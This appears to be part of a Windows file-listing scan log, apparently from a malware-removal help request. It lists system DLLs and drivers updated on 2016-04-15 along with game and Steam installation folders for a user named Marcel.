2016-04-15 23:06 - 2005-02-05 19:45 - 02222800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_24.dll
2016-04-15 23:03 - 2016-04-15 23:03 - 00000000 ____D C:\Users\Marcel\AppData\LocalLow\Adobe
2016-04-15 22:55 - 2016-04-15 22:55 - 00000219 _____ C:\Users\Marcel\Desktop\Dota 2.url
2016-04-15 22:54 - 2016-04-17 15:57 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\StardewValley
2016-04-15 22:54 - 2016-04-15 22:54 - 00000000 ____D C:\Program Files (x86)\Microsoft XNA
2016-04-15 22:54 - 2010-02-04 10:01 - 00528216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_6.dll
2016-04-15 22:54 - 2010-02-04 10:01 - 00238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_6.dll
2016-04-15 22:54 - 2010-02-04 10:01 - 00074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_4.dll
2016-04-15 22:54 - 2010-02-04 10:01 - 00022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_7.dll
2016-04-15 22:54 - 2009-03-09 15:27 - 04178264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_41.dll
2016-04-15 22:54 - 2007-04-04 18:53 - 00081768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_3.dll
2016-04-15 22:54 - 2007-03-12 16:42 - 03495784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_33.dll
2016-04-15 22:53 - 2016-04-15 22:55 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-04-15 22:53 - 2016-04-15 22:53 - 00000222 _____ C:\Users\Marcel\Desktop\Stardew Valley.url
2016-04-15 22:51 - 2016-04-18 03:20 - 00000000 ____D C:\Program Files (x86)\Steam
2016-04-15 22:51 - 2016-04-15 22:51 - 00001032 _____ C:\Users\Public\Desktop\Steam.lnk
2016-04-15 22:51 - 2016-04-15 22:51 - 00000000 ____D C:\Users\Marcel\AppData\Local\Steam
2016-04-15 22:51 - 2016-04-15 22:51 - 00000000 ____D C:\Users\Marcel\AppData\Local\CEF
2016-04-15 22:51 - 2016-04-15 22:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2016-04-15 22:43 - 2016-04-15 22:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mIRC
2016-04-15 22:25 - 2016-04-15 22:26 - 00000000 ____D C:\Windows\system32\MRT
2016-04-15 22:25 - 2016-04-15 22:25 - 135176864 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-04-15 22:25 - 2016-04-02 06:13 - 00369912 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2016-04-15 22:25 - 2016-04-02 05:19 - 01054208 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2016-04-15 22:25 - 2016-03-29 12:20 - 07474016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-04-15 22:25 - 2016-03-29 09:58 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\wininetlui.dll
2016-04-15 22:25 - 2016-03-29 09:58 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-04-15 22:25 - 2016-03-29 09:32 - 00764928 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2016-04-15 22:25 - 2016-03-29 09:15 - 00970752 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-04-15 22:25 - 2016-03-29 09:12 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininetlui.dll
2016-04-15 22:25 - 2016-03-29 09:12 - 00045568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-04-15 22:25 - 2016-03-29 09:02 - 02624512 _____ (Microsoft Corporation) C:\Windows\system32\InputService.dll
2016-04-15 22:25 - 2016-03-29 09:00 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\TextInputFramework.dll
2016-04-15 22:25 - 2016-03-29 08:42 - 03592704 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2016-04-15 22:25 - 2016-03-29 08:37 - 00792064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-04-15 22:25 - 2016-03-29 08:32 - 01731584 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-04-15 22:25 - 2016-03-29 08:31 - 02275328 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-04-15 22:25 - 2016-03-29 08:31 - 01946112 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2016-04-15 22:25 - 2016-03-29 08:28 - 01944576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InputService.dll
2016-04-15 22:25 - 2016-03-29 08:27 - 00245760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TextInputFramework.dll
2016-04-15 22:25 - 2016-03-29 08:26 - 02755584 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-04-15 22:25 - 2016-03-29 08:05 - 01626624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2016-04-15 22:25 - 2016-03-29 08:05 - 01500672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-04-15 22:25 - 2016-03-29 08:05 - 01388032 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-04-15 22:25 - 2016-03-29 08:02 - 02229760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-04-15 22:25 - 2016-03-29 08:01 - 13018624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2016-04-15 22:25 - 2016-03-29 07:56 - 16985600 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2016-04-15 22:25 - 2016-03-29 07:52 - 11545600 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2016-04-15 22:25 - 2016-03-29 07:51 - 22378496 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
2016-04-15 22:25 - 2016-03-29 07:51 - 09918976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2016-04-15 22:25 - 2016-03-29 07:41 - 24602112 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-04-15 22:25 - 2016-03-29 07:41 - 12125184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-04-15 22:25 - 2016-03-29 07:39 - 13382656 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-04-15 22:25 - 2016-03-29 07:38 - 18673664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2016-04-15 22:25 - 2016-03-29 07:37 - 19340800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-04-15 22:25 - 2016-03-29 07:27 - 07836160 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2016-04-15 22:25 - 2016-03-29 07:27 - 05662208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2016-04-15 22:25 - 2016-02-24 11:48 - 00713568 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-04-15 22:25 - 2016-02-24 11:47 - 01173344 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-04-15 22:25 - 2016-02-24 11:40 - 00513888 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-04-15 22:25 - 2016-02-24 11:28 - 03449168 _____ (Microsoft Corporation) C:\Windows\system32\WSService.dll
2016-04-15 22:25 - 2016-02-24 10:46 - 06607080 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
2016-04-15 22:25 - 2016-02-24 10:11 - 01997152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2016-04-15 22:25 - 2016-02-24 10:06 - 05242496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
2016-04-15 22:25 - 2016-02-24 07:09 - 06972416 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2016-04-15 22:25 - 2016-02-24 07:05 - 12586496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2016-04-15 22:25 - 2016-02-24 07:03 - 14252544 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-04-15 22:25 - 2016-02-23 13:25 - 01818696 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-04-15 22:25 - 2016-02-23 12:34 - 01542816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-04-15 22:25 - 2016-02-23 12:32 - 08705672 _____ (Microsoft Corp.) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2016-04-15 22:25 - 2016-02-23 12:31 - 00536256 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2016-04-15 22:25 - 2016-02-23 12:31 - 00408120 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2016-04-15 22:25 - 2016-02-23 12:21 - 22564328 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-04-15 22:25 - 2016-02-23 11:38 - 06952088 _____ (Microsoft Corp.) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-04-15 22:25 - 2016-02-23 11:27 - 21124344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-04-15 22:25 - 2016-02-23 10:28 - 00275456 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll
2016-04-15 22:25 - 2016-02-23 09:52 - 00456704 _____ (Microsoft Corporation) C:\Windows\system32\ipnathlp.dll
2016-04-15 22:25 - 2016-02-23 08:55 - 04894208 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-04-15 22:25 - 2016-02-23 08:36 - 03666432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-04-15 22:25 - 2016-02-23 08:35 - 07533568 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2016-04-15 22:24 - 2016-04-02 06:10 - 00770640 _____ (Microsoft Corporation) C:\Windows\system32\iuilp.dll
2016-04-15 22:24 - 2016-04-02 06:10 - 00730344 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Shell.Broker.dll
2016-04-15 22:24 - 2016-04-02 06:10 - 00374008 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlows.exe
2016-04-15 22:24 - 2016-04-02 05:30 - 00151040 _____ (Microsoft Corporation) C:\Windows\system32\VEStoreEventHandlers.dll
2016-04-15 22:24 - 2016-04-02 05:29 - 00127488 _____ (Microsoft Corporation) C:\Windows\system32\VEDataLayerHelpers.dll
2016-04-15 22:24 - 2016-04-02 05:29 - 00083968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VEDataLayerHelpers.dll
2016-04-15 22:24 - 2016-04-02 05:26 - 00630272 _____ (Microsoft Corporation) C:\Windows\system32\PhoneProviders.dll
2016-04-15 22:24 - 2016-04-02 05:25 - 00278528 _____ (Microsoft Corporation) C:\Windows\system32\NotificationObjFactory.dll
2016-04-15 22:24 - 2016-04-02 05:25 - 00239104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NotificationObjFactory.dll
2016-04-15 22:24 - 2016-04-02 05:23 - 00285696 _____ (Microsoft Corporation) C:\Windows\system32\VEEventDispatcher.dll
2016-04-15 22:24 - 2016-04-02 05:23 - 00219648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VEEventDispatcher.dll
2016-04-15 22:24 - 2016-04-02 05:21 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\tileobjserver.dll
2016-04-15 22:24 - 2016-04-02 05:18 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\SharedStartModel.dll
2016-04-15 22:24 - 2016-04-02 05:15 - 01090048 _____ (Microsoft Corporation) C:\Windows\system32\RDXService.dll
2016-04-15 22:24 - 2016-04-02 05:14 - 03994624 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_nt.dll
2016-04-15 22:24 - 2016-04-02 05:09 - 01832448 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.dll
2016-04-15 22:24 - 2016-04-02 05:08 - 02193408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll
2016-04-15 22:24 - 2016-04-02 05:07 - 03575296 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsThresholdAdminFlowUI.dll
2016-04-15 22:24 - 2016-04-02 05:07 - 02158592 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2016-04-15 22:24 - 2016-04-02 05:03 - 04774912 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2016-04-15 22:24 - 2016-04-02 05:00 - 01390080 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Shell.dll
2016-04-15 22:24 - 2016-03-29 12:23 - 00277856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2016-04-15 22:24 - 2016-03-29 12:22 - 01030416 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-04-15 22:24 - 2016-03-29 12:22 - 00874968 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2016-04-15 22:24 - 2016-03-29 12:20 - 02656952 _____ C:\Windows\system32\CoreUIComponents.dll
2016-04-15 22:24 - 2016-03-29 12:20 - 01317640 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-04-15 22:24 - 2016-03-29 12:20 - 01141504 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2016-04-15 22:24 - 2016-03-29 12:18 - 02152280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2016-04-15 22:24 - 2016-03-29 12:15 - 00100232 _____ (Microsoft Corporation) C:\Windows\system32\omadmapi.dll
2016-04-15 22:24 - 2016-03-29 12:11 - 00686976 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll
2016-04-15 22:24 - 2016-03-29 12:05 - 01152864 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2016-04-15 22:24 - 2016-03-29 12:02 - 00989536 _____ (Microsoft Corporation) C:\Windows\system32\SecConfig.efi
2016-04-15 22:24 - 2016-03-29 12:02 - 00334736 _____ (Microsoft Corporation) C:\Windows\system32\policymanager.dll
2016-04-15 22:24 - 2016-03-29 11:56 - 01297752 _____ (Microsoft Corporation) C:\Windows\system32\LicenseManager.dll
2016-04-15 22:24 - 2016-03-29 11:37 - 01862008 _____ C:\Windows\SysWOW64\CoreUIComponents.dll
2016-04-15 22:24 - 2016-03-29 11:28 - 00696664 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupEngine.dll
2016-04-15 22:24 - 2016-03-29 11:28 - 00535080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
2016-04-15 22:24 - 2016-03-29 11:28 - 00115040 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupApi.dll
2016-04-15 22:24 - 2016-03-29 11:25 - 00258912 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ufx01000.sys
2016-04-15 22:24 - 2016-03-29 11:25 - 00058400 _____ (Microsoft Corporation) C:\Windows\system32\SensorsNativeApi.dll
2016-04-15 22:24 - 2016-03-29 11:19 - 00296488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\policymanager.dll
2016-04-15 22:24 - 2016-03-29 11:18 - 00185184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsd.sys
2016-04-15 22:24 - 2016-03-29 11:17 - 00300104 _____ (Microsoft Corporation) C:\Windows\system32\LockAppHost.exe
2016-04-15 22:24 - 2016-03-29 11:13 - 00986976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LicenseManager.dll
2016-04-15 22:24 - 2016-03-29 11:11 - 00605440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-04-15 22:24 - 2016-03-29 11:11 - 00074424 _____ (Microsoft Corporation) C:\Windows\system32\easinvoker.exe
2016-04-15 22:24 - 2016-03-29 11:10 - 00110584 _____ (Microsoft Corporation) C:\Windows\system32\srvcli.dll
2016-04-15 22:24 - 2016-03-29 11:09 - 00078040 _____ (Microsoft Corporation) C:\Windows\system32\wkscli.dll
2016-04-15 22:24 - 2016-03-29 11:08 - 00358752 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-04-15 22:24 - 2016-03-29 11:08 - 00261376 _____ (Microsoft Corporation) C:\Windows\system32\LsaIso.exe
2016-04-15 22:24 - 2016-03-29 11:07 - 00081144 _____ (Microsoft Corporation) C:\Windows\system32\netapi32.dll
2016-04-15 22:24 - 2016-03-29 10:44 - 00502104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupEngine.dll
2016-04-15 22:24 - 2016-03-29 10:44 - 00084832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupApi.dll
2016-04-15 22:24 - 2016-03-29 10:41 - 00630632 _____ (Microsoft Corporation) C:\Windows\system32\fontdrvhost.exe
2016-04-15 22:24 - 2016-03-29 10:41 - 00051128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SensorsNativeApi.dll
2016-04-15 22:24 - 2016-03-29 10:32 - 00253088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LockAppHost.exe
2016-04-15 22:24 - 2016-03-29 10:26 - 02403680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2016-04-15 22:24 - 2016-03-29 10:26 - 01089888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2016-04-15 22:24 - 2016-03-29 10:26 - 00073872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srvcli.dll
2016-04-15 22:24 - 2016-03-29 10:25 - 00056320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wkscli.dll
2016-04-15 22:24 - 2016-03-29 10:24 - 00294752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-04-15 22:24 - 2016-03-29 10:23 - 00069744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netapi32.dll
2016-04-15 22:24 - 2016-03-29 10:21 - 00378208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBXHCI.SYS
2016-04-15 22:24 - 2016-03-29 10:17 - 00089088 _____ (Microsoft Corporation) C:\Windows\system32\MapsCSP.dll
2016-04-15 22:24 - 2016-03-29 10:16 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\xinputhid.sys
2016-04-15 22:24 - 2016-03-29 10:07 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\SensorsNativeApi.V2.dll
2016-04-15 22:24 - 2016-03-29 10:07 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\policymanagerprecheck.dll
2016-04-15 22:24 - 2016-03-29 10:07 - 00048128 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2016-04-15 22:24 - 2016-03-29 10:07 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\dmenterprisediagnostics.dll
2016-04-15 22:24 - 2016-03-29 10:07 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\wsdchngr.dll
2016-04-15 22:24 - 2016-03-29 10:06 - 00045568 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-04-15 22:24 - 2016-03-29 10:06 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\oleacchooks.dll
2016-04-15 22:24 - 2016-03-29 10:02 - 00118272 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2016-04-15 22:24 - 2016-03-29 10:01 - 00541304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontdrvhost.exe
2016-04-15 22:24 - 2016-03-29 10:00 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\NetCfgNotifyObjectHost.exe
2016-04-15 22:24 - 2016-03-29 10:00 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\fveskybackup.dll
2016-04-15 22:24 - 2016-03-29 10:00 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\mapsupdatetask.dll
2016-04-15 22:24 - 2016-03-29 09:59 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\LicenseManagerShellext.exe
2016-04-15 22:24 - 2016-03-29 09:57 - 00199168 _____ (Microsoft Corporation) C:\Windows\system32\InstallAgent.exe
2016-04-15 22:24 - 2016-03-29 09:57 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2016-04-15 22:24 - 2016-03-29 09:57 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\MosStorage.dll
2016-04-15 22:24 - 2016-03-29 09:57 - 00058368 _____ (Microsoft Corporation) C:\Windows\system32\browcli.dll
2016-04-15 22:24 - 2016-03-29 09:55 - 00120320 _____ (Microsoft Corporation) C:\Windows\system32\MapsBtSvc.dll
2016-04-15 22:24 - 2016-03-29 09:55 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\serial.sys
2016-04-15 22:24 - 2016-03-29 09:55 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\tbauth.dll
2016-04-15 22:24 - 2016-03-29 09:54 - 00147456 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-04-15 22:24 - 2016-03-29 09:53 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\FontProvider.dll
2016-04-15 22:24 - 2016-03-29 09:52 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\TokenBrokerCookies.exe
2016-04-15 22:24 - 2016-03-29 09:51 - 00167936 _____ (Microsoft Corporation) C:\Windows\system32\dafBth.dll
2016-04-15 22:24 - 2016-03-29 09:51 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\tzautoupdate.dll
2016-04-15 22:24 - 2016-03-29 09:50 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\BdeHdCfgLib.dll
2016-04-15 22:24 - 2016-03-29 09:50 - 00088576 _____ (Microsoft Corporation) C:\Windows\system32\AppxSysprep.dll
2016-04-15 22:24 - 2016-03-29 09:50 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\moshost.dll
2016-04-15 22:24 - 2016-03-29 09:50 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\OnDemandConnRouteHelper.dll
2016-04-15 22:24 - 2016-03-29 09:50 - 00033280 _____ (Microsoft Corporation) C:\Windows\system32\wuautoappupdate.dll
2016-04-15 22:24 - 2016-03-29 09:49 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\browserbroker.dll
2016-04-15 22:24 - 2016-03-29 09:48 - 00144896 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Devices.dll
2016-04-15 22:24 - 2016-03-29 09:48 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\AppCapture.dll
2016-04-15 22:24 - 2016-03-29 09:46 - 00365568 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-04-15 22:24 - 2016-03-29 09:46 - 00134656 _____ (Microsoft Corporation) C:\Windows\system32\browser.dll
2016-04-15 22:24 - 2016-03-29 09:44 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\DAFWSD.dll
2016-04-15 22:24 - 2016-03-29 09:42 - 00269824 _____ (Microsoft Corporation) C:\Windows\system32\moshostcore.dll
2016-04-15 22:24 - 2016-03-29 09:39 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\StoreAgent.dll
2016-04-15 22:24 - 2016-03-29 09:38 - 00207360 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupSvc.dll
2016-04-15 22:24 - 2016-03-29 09:37 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\StorSvc.dll
2016-04-15 22:24 - 2016-03-29 09:36 - 00530432 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\nwifi.sys
2016-04-15 22:24 - 2016-03-29 09:36 - 00209408 _____ (Microsoft Corporation) C:\Windows\system32\storewuauth.dll
2016-04-15 22:24 - 2016-03-29 09:35 - 00411648 _____ (Microsoft Corporation) C:\Windows\system32\oleacc.dll
2016-04-15 22:24 - 2016-03-29 09:35 - 00239616 _____ (Microsoft Corporation) C:\Windows\system32\credprovhost.dll
2016-04-15 22:24 - 2016-03-29 09:34 - 00686592 _____ (Microsoft Corporation) C:\Windows\system32\ieproxy.dll
2016-04-15 22:24 - 2016-03-29 09:34 - 00641536 _____ (Microsoft Corporation) C:\Windows\system32\enterprisecsps.dll
2016-04-15 22:24 - 2016-03-29 09:34 - 00333824 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\portcls.sys
2016-04-15 22:24 - 2016-03-29 09:34 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll
2016-04-15 22:24 - 2016-03-29 09:33 - 00174592 _____ (Microsoft Corporation) C:\Windows\system32\easwrt.dll
2016-04-15 22:24 - 2016-03-29 09:32 - 00414720 _____ (Microsoft Corporation) C:\Windows\system32\bcastdvr.exe
2016-04-15 22:24 - 2016-03-29 09:30 - 00328192 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2016-04-15 22:24 - 2016-03-29 09:30 - 00161792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-04-15 22:24 - 2016-03-29 09:28 - 00460288 _____ (Microsoft Corporation) C:\Windows\system32\MapConfiguration.dll
2016-04-15 22:24 - 2016-03-29 09:27 - 00339968 _____ (Microsoft Corporation) C:\Windows\system32\SensorService.dll
2016-04-15 22:24 - 2016-03-29 09:26 - 00169472 _____ (Microsoft Corporation) C:\Windows\system32\mdmmigrator.dll
2016-04-15 22:24 - 2016-03-29 09:23 - 00694784 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdiWiFi.sys
2016-04-15 22:24 - 2016-03-29 09:23 - 00628736 _____ (Microsoft Corporation) C:\Windows\system32\MessagingDataModel2.dll
2016-04-15 22:24 - 2016-03-29 09:23 - 00324608 _____ (Microsoft Corporation) C:\Windows\system32\RDXTaskFactory.dll
2016-04-15 22:24 - 2016-03-29 09:22 - 00438784 _____ (Microsoft Corporation) C:\Windows\system32\AccountsRt.dll
2016-04-15 22:24 - 2016-03-29 09:21 - 00330240 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-04-15 22:24 - 2016-03-29 09:20 - 00948736 _____ (Microsoft Corporation) C:\Windows\system32\XblAuthManager.dll
2016-04-15 22:24 - 2016-03-29 09:20 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\AboveLockAppHost.dll
2016-04-15 22:24 - 2016-03-29 09:20 - 00080384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SensorsNativeApi.V2.dll
2016-04-15 22:24 - 2016-03-29 09:20 - 00026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsdchngr.dll
2016-04-15 22:24 - 2016-03-29 09:19 - 00556032 _____ (Microsoft Corporation) C:\Windows\system32\PsmServiceExtHost.dll
2016-04-15 22:24 - 2016-03-29 09:19 - 00037376 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-04-15 22:24 - 2016-03-29 09:19 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleacchooks.dll
2016-04-15 22:24 - 2016-03-29 09:18 - 00676352 _____ (Microsoft Corporation) C:\Windows\system32\WSDApi.dll
2016-04-15 22:24 - 2016-03-29 09:17 - 01056256 _____ (Microsoft Corporation) C:\Windows\system32\JpMapControl.dll
2016-04-15 22:24 - 2016-03-29 09:17 - 00708608 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authentication.Web.Core.dll
2016-04-15 22:24 - 2016-03-29 09:17 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\CredProvDataModel.dll
2016-04-15 22:24 - 2016-03-29 09:16 - 00852480 _____ (Microsoft Corporation) C:\Windows\system32\MapsStore.dll
2016-04-15 22:24 - 2016-03-29 09:16 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2016-04-15 22:24 - 2016-03-29 09:15 - 01714688 _____ (Microsoft Corporation) C:\Windows\system32\SRHInproc.dll
2016-04-15 22:24 - 2016-03-29 09:14 - 00965632 _____ (Microsoft Corporation) C:\Windows\system32\SRH.dll
2016-04-15 22:24 - 2016-03-29 09:14 - 00859136 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.dll
2016-04-15 22:24 - 2016-03-29 09:13 - 00587776 _____ (Microsoft Corporation) C:\Windows\system32\bisrv.dll
2016-04-15 22:24 - 2016-03-29 09:12 - 00471552 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupShim.dll
2016-04-15 22:24 - 2016-03-29 09:11 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\NMAA.dll
2016-04-15 22:24 - 2016-03-29 09:11 - 00881664 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Input.Inking.dll
2016-04-15 22:24 - 2016-03-29 09:11 - 00161280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InstallAgent.exe
2016-04-15 22:24 - 2016-03-29 09:11 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\samlib.dll
2016-04-15 22:24 - 2016-03-29 09:11 - 00059904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MosStorage.dll
2016-04-15 22:24 - 2016-03-29 09:11 - 00043520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\browcli.dll
2016-04-15 22:24 - 2016-03-29 09:10 - 01388544 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
